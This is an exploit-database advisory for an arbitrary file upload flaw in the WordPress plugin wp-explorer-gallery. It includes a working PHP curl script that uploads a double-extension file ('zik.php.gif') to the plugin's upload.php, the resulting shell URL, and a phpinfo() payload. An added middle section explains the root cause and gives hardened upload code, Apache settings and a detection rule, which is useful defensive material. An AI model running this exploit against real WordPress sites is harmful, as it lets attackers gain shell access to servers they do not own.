WordPress plugins wp-explorer-gallery Arbitrary File Upload Vulnerability

An Arbitrary File Upload vulnerability has been found in the WordPress plugin wp-explorer-gallery.
Through this vulnerability a PHP shell can be uploaded and access to the server obtained.

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Zikou-16 member from Inj3ct0r Team                 1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
-----------------------------------------------------------------------
Wordpress plugins  -  wp-explorer-gallery Arbitrary File Upload Vulnerability
-----------------------------------------------------------------------
 
#####
# Author => Zikou-16
# E-mail => zikou16x@gmail.com
# Facebook => http://fb.me/Zikou.se
# Google Dork => nO x)
# Tested on : Windows 7 , Backtrack 5r3
# Download plugin : http://xmlswf.com/images/stories/WP_plugins/wp-explorer-gallery.zip
####
 
#=> Exploit Info :
------------------
# The attacker can upload file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-';     // Characters allowed in the file name (in a Regular Expression format)
------------------
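 
The root cause described above is that the upload handler keeps the client-supplied filename (including every dotted segment) and only checks whether its final extension is on the jpg/gif/png list, so "zik.php.gif" is accepted and stored as random_name.php.gif; on an Apache host that maps any *.php.* name to the PHP handler, that file executes. The following is an added example, not code from the wp-explorer-gallery plugin, showing that extension-only check next to a hardened handler that sniffs the content, chooses a single server-side extension from the detected type, discards the client name entirely and ignores any client-chosen "folder". All function names here are hypothetical.

```php
<?php
// Added example (not the plugin's own code). Demonstrates why a final-extension
// allow-list accepts "zik.php.gif", and a hardened handler that does not trust
// the client's filename or target folder at all.

const ALLOWED_TYPES = [
    'image/jpeg' => 'jpg',
    'image/gif'  => 'gif',
    'image/png'  => 'png',
];

// Weak check: looks only at the last extension of the client-supplied name.
// Returns true for "zik.php.gif"; if the stored file keeps that name, a server
// configured with AddHandler for .php will execute it.
function extension_only_check(string $clientName): bool {
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    return in_array($ext, array_values(ALLOWED_TYPES), true);
}

// Hardened: returns a safe filename to store under, or null to reject.
function safe_image_name(string $tmpPath): ?string {
    // 1. Decide the type from the bytes, not from the name. finfo checks the
    //    magic signature; getimagesize additionally requires a parseable header,
    //    and both must agree.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime = $finfo->file($tmpPath);
    if ($mime === false || !isset(ALLOWED_TYPES[$mime])) {
        return null;
    }
    $info = @getimagesize($tmpPath);
    if ($info === false || image_type_to_mime_type($info[2]) !== $mime) {
        return null;
    }
    // 2. Build a fresh name: random hex plus exactly one extension chosen by the
    //    server from the detected type. Nothing from the client survives, so
    //    "shell.php.gif", ".htaccess" or names with odd characters never reach
    //    the filesystem.
    return bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
}

// Glue for a real handler. $file is one entry of $_FILES; $uploadDir is a
// fixed directory chosen by the server (the advisory's exploit posts its own
// 'folder' field; a hardened handler must not read such a field at all).
function store_upload(array $file, string $uploadDir): ?string {
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $name = safe_image_name($file['tmp_name']);
    if ($name === null) {
        return null;
    }
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    return move_uploaded_file($file['tmp_name'], $dest) ? $dest : null;
}

// Illustration of the difference (constructed names, no real upload):
var_dump(extension_only_check('zik.php.gif'));   // bool(true): the weak check passes it
var_dump(extension_only_check('photo.jpg'));     // bool(true)
```

Two server-side controls belong next to this code. First, the uploads directory should never execute scripts regardless of filename: with Apache, bind the PHP handler with `SetHandler` inside a `<FilesMatch "\.php$">` block rather than `AddHandler` (which also matches `name.php.gif`), and disable the engine under wp-content/uploads. Second, a detection rule that flags POST requests to a plugin's upload.php followed by the appearance of files whose name contains more than one extension in the uploads tree will catch exactly the pattern this advisory describes.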
 
-----------
#=> Exploit 
-----------
<?php
 
$uploadfile="zik.php.gif";
$ch = curl_init("http://[target]/[path]/wp-content/plugins/wp-explorer-gallery/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads//'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
 
print "$postResult";
?> 
 
Shell Access : http://[target]/[path]/wp-content/uploads/random_name.php.gif
 
<?php
phpinfo();
?>
 
------------------------------
 
Greet'z To #=> KedAns-Dz - JIGsaw - Elite Trojan - Anonymous Algeria - DZMafia & All Inj3ct0r Member  <= Th3 End ^_^
